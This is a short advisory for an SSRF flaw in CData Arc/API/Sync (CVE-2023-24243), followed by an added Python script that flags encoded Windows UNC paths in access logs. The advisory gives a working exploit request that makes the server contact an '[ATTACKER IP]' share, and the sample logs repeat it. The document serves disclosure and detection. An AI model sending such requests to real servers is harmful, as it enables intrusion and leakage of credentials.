DEVCORE d3vc0r3

d3vc0r3 / CVE-2023-24243.md
Created June 15, 2023 15:12
Server-Side Request Forgery (SSRF) vulnerability in CData Arc/API/Sync <= v22.0.8336

Description

Send an HTTP request like the following to a remote CData server running on Windows:

GET /%255c%255c[ATTACKER IP]%255cC$%255cbb HTTP/1.1
Host: cdata.arc.ip
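
For detection, the following added example (not part of the original gist) flags logged request targets that decode, through one or more percent-encoding layers, to a Windows UNC path like the one in the request above. It also covers the single-encoded form, which goes beyond the request shown. The log format, sample lines, addresses and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a common-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# UNC prefix after decoding: optional leading "/", two backslashes, a host, a separator
UNC_RE = re.compile(r'^/*\\\\[^\\/]+[\\/]')
MAX_ROUNDS = 5  # assumption: upper bound on nested percent-encoding layers


def fully_decode(value):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def unc_target(target):
    """Return (decoded_path, rounds) if the path decodes to a UNC path, else None."""
    decoded, rounds = fully_decode(target.split("?", 1)[0])
    return (decoded, rounds) if UNC_RE.match(decoded) else None


def scan(lines):
    """Return [(line_number, decoded_path, rounds)] for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hit = unc_target(m.group("target")) if m else None
        if hit:
            hits.append((number, *hit))
    return hits


# Constructed access-log lines (documentation-range addresses, not real traffic)
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Jun/2023:15:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.44 - - [15/Jun/2023:15:12:09 +0000] "GET /%255c%255c198.51.100.7%255cC$%255cbb HTTP/1.1" 404 0',
    '203.0.113.10 - - [15/Jun/2023:15:12:30 +0000] "GET /search?q=a%5cb HTTP/1.1" 200 77',
    '203.0.113.51 - - [15/Jun/2023:15:13:02 +0000] "GET /%5c%5c198.51.100.7%5cshare%5cx HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, path, rounds in scan(SAMPLE_LOG):
        print(f"line {number}: UNC path {path!r} after {rounds} decode round(s)")
```

The number of decode rounds is reported because a target that needs two or more rounds to reach a UNC path is unlikely to come from a normal client.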